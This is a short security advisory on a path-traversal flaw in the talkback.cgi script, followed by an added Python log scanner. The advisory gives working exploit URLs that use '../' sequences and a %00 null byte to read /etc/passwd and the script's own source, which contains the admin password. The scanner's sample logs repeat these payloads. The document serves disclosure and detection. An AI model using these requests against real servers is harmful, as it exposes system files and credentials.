Name   : talkback (CGI): "show files" vulnerability.
Problem: Talkback.cgi may allow remote users (website visitors) to
         view any file on a webserver (depending on the user the
         webserver is running as).

Exploit:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00&action=view&matchview=1

This will display /etc/passwd (if the webserver user has
access to this file).

Another URL can display the source of talkback.cgi itself,
which contains the admin password:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00&action=view&matchview=1

(You might have to use another path instead of
../cgi-bin/talkback.cgi%00; this depends on where the
cgi-bin is installed.)

                by: Stan a.k.a. ThePike (stan@whizkunde.org)
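
Added example (not part of the original advisory, and not code from
talkback itself): a log check that flags requests to talkback.cgi whose
"article" parameter carries the null byte or parent-directory segments
shown above. The combined-log-format input, the sample lines and the
function names are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; addresses, times and sizes are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] "GET /cgi-bin/talkback.cgi?article=12&action=view&matchview=1 HTTP/1.0" 200 5120',
    '192.0.2.44 - - [01/Jan/2001:10:02:11 +0000] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 200 1432',
    '192.0.2.44 - - [01/Jan/2001:10:02:40 +0000] "GET /cgi-bin/talkback.cgi?article=../cgi-bin/talkback.cgi%00&action=view&matchview=1 HTTP/1.0" 200 20113',
    '192.0.2.77 - - [01/Jan/2001:10:05:00 +0000] "GET /cgi-bin/search.cgi?q=../notes HTTP/1.0" 200 300',
    '192.0.2.44 - - [01/Jan/2001:10:06:30 +0000] "GET /cgi-bin/talkback.cgi?article=%2e%2e%2f%2e%2e%2fetc%2fpasswd&action=view HTTP/1.0" 200 0',
]

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_article(value):
    """Return the reasons a decoded 'article' value looks like a file-read attempt."""
    reasons = []
    if "\x00" in value:                      # %00 used to cut off an appended suffix
        reasons.append("null byte")
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("parent-directory segment")
    if value.startswith("/"):
        reasons.append("absolute path")
    return reasons


def scan(lines):
    """Return (line number, reasons) for every flagged talkback.cgi request."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/talkback.cgi"):
            continue
        # parse_qs percent-decodes the value, so %00 and %2e%2e%2f are seen decoded.
        for value in parse_qs(url.query, keep_blank_values=True).get("article", []):
            reasons = suspicious_article(value)
            if reasons:
                hits.append((lineno, reasons))
    return hits


if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(reasons)}")
```

A hit with response status 200 and a non-trivial body size is the case
to review first, since it suggests the file content was returned.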